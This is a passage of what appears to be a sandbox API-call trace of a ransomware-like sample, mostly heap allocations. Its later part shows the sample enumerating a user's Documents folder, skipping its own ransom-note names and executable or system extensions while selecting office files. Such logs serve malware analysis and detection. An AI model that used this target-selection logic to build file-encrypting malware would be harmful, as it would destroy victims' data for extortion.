(HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0120 [0105.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0330 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x77e328 [0105.022] QueryPerformanceCounter (in: lpPerformanceCount=0x292f268 | out: lpPerformanceCount=0x292f268*=22497740998) returned 1 [0105.022] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x292f2a8 | out: lpSystemTimeAsFileTime=0x292f2a8*(dwLowDateTime=0x2c33f5c0, dwHighDateTime=0x1d62227)) [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b908 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc48 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x72bc48 [0105.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b908 | out: hHeap=0x6d0000) returned 1 [0105.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b298 [0105.023] GetLastError () returned 0x0 [0105.023] SetLastError (dwErrCode=0x0) [0105.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b298 | out: hHeap=0x6d0000) returned 1 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e328 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e448 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e568 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bc48 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bce8 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e688 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703220 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd38 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703340 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x513) returned 0x703460 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703980 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x703aa0 [0105.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703980 | out: hHeap=0x6d0000) returned 1 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x703cc0 [0105.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703aa0 | out: hHeap=0x6d0000) returned 1 [0105.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd60 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd88 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd60 | out: hHeap=0x6d0000) returned 1 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703980 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd88 | out: hHeap=0x6d0000) returned 1 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x703aa0 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x52b) returned 0x703ee0 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703ee0 | out: hHeap=0x6d0000) returned 1 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703aa0 | out: hHeap=0x6d0000) returned 1 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703cc0 | out: hHeap=0x6d0000) returned 1 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc) returned 0x77d728 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd88 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd60 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bdb0 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bdd8 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd60 | out: hHeap=0x6d0000) returned 1 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd88 | out: hHeap=0x6d0000) returned 1 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x703aa0 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd88 [0105.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bd60 [0105.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd88 | out: hHeap=0x6d0000) returned 1 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703cc0 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd60 | out: hHeap=0x6d0000) returned 1 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x23) returned 0x72a7c8 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x433) returned 0x703de0 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703de0 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a7c8 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd38 | out: hHeap=0x6d0000) returned 1 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703de0 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703cc0 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703aa0 | out: hHeap=0x6d0000) returned 1 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703aa0 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703bc0 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bce8 | out: hHeap=0x6d0000) returned 1 [0105.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703f00 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703bc0 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bdd8 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bdb0 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703aa0 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0105.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d728 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703980 | out: hHeap=0x6d0000) returned 1 [0105.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x703980 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703980 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703460 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703340 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703de0 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703220 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e688 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc48 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e568 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e448 | out: hHeap=0x6d0000) returned 1 [0105.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e448 [0105.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x77e568 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e448 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e568 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f00 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e328 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0330 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bd10 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e208 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8d8 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d6f8 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc98 | out: hHeap=0x6d0000) returned 1 [0105.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8f8 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df128 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bc70 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8b8 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0228 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bcc0 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef160 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x702008 | out: hHeap=0x6d0000) returned 1 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0105.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef160 [0105.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0105.027] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x77c590 [0105.027] lstrcpyW (in: lpString1=0x292f414, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0105.027] PathAddBackslashW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="" [0105.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0105.027] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77d698 [0105.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.027] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb8f8480, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb8f8480, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.028] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.028] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.028] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee08bf70, ftCreationTime.dwHighDateTime=0x1d5dbb2, ftLastAccessTime.dwLowDateTime=0xf2cac20, ftLastAccessTime.dwHighDateTime=0x1d5d7c6, ftLastWriteTime.dwLowDateTime=0xf2cac20, ftLastWriteTime.dwHighDateTime=0x1d5d7c6, nFileSizeHigh=0x0, nFileSizeLow=0xf67f, dwReserved0=0x0, dwReserved1=0x0, cFileName="8Z-xFMuafWn712Plg.rtf", cAlternateFileName="8Z-XFM~1.RTF")) returned 1 [0105.028] lstrcmpW (lpString1="8Z-xFMuafWn712Plg.rtf", lpString2=".") returned 1 [0105.028] lstrcmpW (lpString1="8Z-xFMuafWn712Plg.rtf", lpString2="..") returned 1 [0105.028] lstrcmpiW (lpString1="8Z-xFMuafWn712Plg.rtf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.028] lstrcmpiW (lpString1="8Z-xFMuafWn712Plg.rtf", lpString2="Decryptor_Info.hta") returned -1 [0105.028] PathFindExtensionW (pszPath="8Z-xFMuafWn712Plg.rtf") returned=".rtf" [0105.028] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0105.028] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0105.028] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0105.028] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0105.028] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0105.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77df00 [0105.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.028] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3d12c0, ftCreationTime.dwHighDateTime=0x1d5e088, ftLastAccessTime.dwLowDateTime=0x7c9d5db0, ftLastAccessTime.dwHighDateTime=0x1d56cc6, ftLastWriteTime.dwLowDateTime=0x7c9d5db0, ftLastWriteTime.dwHighDateTime=0x1d56cc6, nFileSizeHigh=0x0, nFileSizeLow=0x6e33, dwReserved0=0x0, dwReserved1=0x0, cFileName="a eeK3Cof0F.xlsx", cAlternateFileName="AEEK3C~1.XLS")) returned 1 [0105.028] lstrcmpW (lpString1="a eeK3Cof0F.xlsx", lpString2=".") returned 1 [0105.028] lstrcmpW (lpString1="a eeK3Cof0F.xlsx", lpString2="..") returned 1 [0105.029] lstrcmpiW (lpString1="a eeK3Cof0F.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.029] lstrcmpiW (lpString1="a eeK3Cof0F.xlsx", lpString2="Decryptor_Info.hta") returned -1 [0105.029] PathFindExtensionW (pszPath="a eeK3Cof0F.xlsx") returned=".xlsx" [0105.029] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.029] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.029] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.029] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.029] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.029] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e168 [0105.029] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.029] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5aa9c30, ftCreationTime.dwHighDateTime=0x1d5c7af, ftLastAccessTime.dwLowDateTime=0x1df2d3b0, ftLastAccessTime.dwHighDateTime=0x1d58cda, ftLastWriteTime.dwLowDateTime=0x1df2d3b0, ftLastWriteTime.dwHighDateTime=0x1d58cda, nFileSizeHigh=0x0, nFileSizeLow=0x173cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bfc017GN5tmh.pptx", cAlternateFileName="BFC017~1.PPT")) returned 1 [0105.029] lstrcmpW (lpString1="bfc017GN5tmh.pptx", lpString2=".") returned 1 [0105.029] lstrcmpW (lpString1="bfc017GN5tmh.pptx", lpString2="..") returned 1 [0105.029] lstrcmpiW (lpString1="bfc017GN5tmh.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.029] lstrcmpiW (lpString1="bfc017GN5tmh.pptx", lpString2="Decryptor_Info.hta") returned -1 [0105.029] PathFindExtensionW (pszPath="bfc017GN5tmh.pptx") returned=".pptx" [0105.029] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.029] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.029] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.029] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.029] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e1f0 [0105.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.030] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x858e09b0, ftCreationTime.dwHighDateTime=0x1d5c9f0, ftLastAccessTime.dwLowDateTime=0xb79c6840, ftLastAccessTime.dwHighDateTime=0x1d5b364, ftLastWriteTime.dwLowDateTime=0xb79c6840, ftLastWriteTime.dwHighDateTime=0x1d5b364, nFileSizeHigh=0x0, nFileSizeLow=0x2bea, dwReserved0=0x0, dwReserved1=0x0, cFileName="c1J1Vr7hWq.xlsx", cAlternateFileName="C1J1VR~1.XLS")) returned 1 [0105.030] lstrcmpW (lpString1="c1J1Vr7hWq.xlsx", lpString2=".") returned 1 [0105.030] lstrcmpW (lpString1="c1J1Vr7hWq.xlsx", lpString2="..") returned 1 [0105.030] lstrcmpiW (lpString1="c1J1Vr7hWq.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.030] lstrcmpiW (lpString1="c1J1Vr7hWq.xlsx", lpString2="Decryptor_Info.hta") returned -1 [0105.030] PathFindExtensionW (pszPath="c1J1Vr7hWq.xlsx") returned=".xlsx" [0105.030] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0105.030] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0105.030] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0105.030] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0105.030] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x77e278 [0105.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.030] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3040700, ftCreationTime.dwHighDateTime=0x1d5de14, ftLastAccessTime.dwLowDateTime=0xc9436020, ftLastAccessTime.dwHighDateTime=0x1d5ae6a, ftLastWriteTime.dwLowDateTime=0xc9436020, ftLastWriteTime.dwHighDateTime=0x1d5ae6a, nFileSizeHigh=0x0, nFileSizeLow=0xbbeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="cG9Y_mfr-.docx", cAlternateFileName="CG9Y_M~1.DOC")) returned 1 [0105.030] lstrcmpW (lpString1="cG9Y_mfr-.docx", lpString2=".") returned 1 [0105.030] lstrcmpW (lpString1="cG9Y_mfr-.docx", lpString2="..") returned 1 [0105.031] lstrcmpiW (lpString1="cG9Y_mfr-.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.031] lstrcmpiW (lpString1="cG9Y_mfr-.docx", lpString2="Decryptor_Info.hta") returned -1 [0105.031] PathFindExtensionW (pszPath="cG9Y_mfr-.docx") returned=".docx" [0105.031] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.031] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.031] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.031] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.031] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef1c8 [0105.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x77e0d0 [0105.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef1c8 | out: hHeap=0x6d0000) returned 1 [0105.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x77e2f0 [0105.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e0d0 | out: hHeap=0x6d0000) returned 1 [0105.031] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0105.031] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0105.031] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0105.031] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.031] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0105.031] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0105.031] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0105.031] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0105.032] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0105.032] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0105.032] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0105.032] FindNextFileW (in: hFindFile=0x77d698, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6a2320, ftCreationTime.dwHighDateTime=0x1d5a739, ftLastAccessTime.dwLowDateTime=0x47ce94f0, ftLastAccessTime.dwHighDateTime=0x1d5a9c5, ftLastWriteTime.dwLowDateTime=0x47ce94f0, ftLastWriteTime.dwHighDateTime=0x1d5a9c5, nFileSizeHigh=0x0, nFileSizeLow=0x15dbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="f41TDB3cCDdGN.docx", cAlternateFileName="F41TDB~1.DOC")) returned 1 [0105.032] 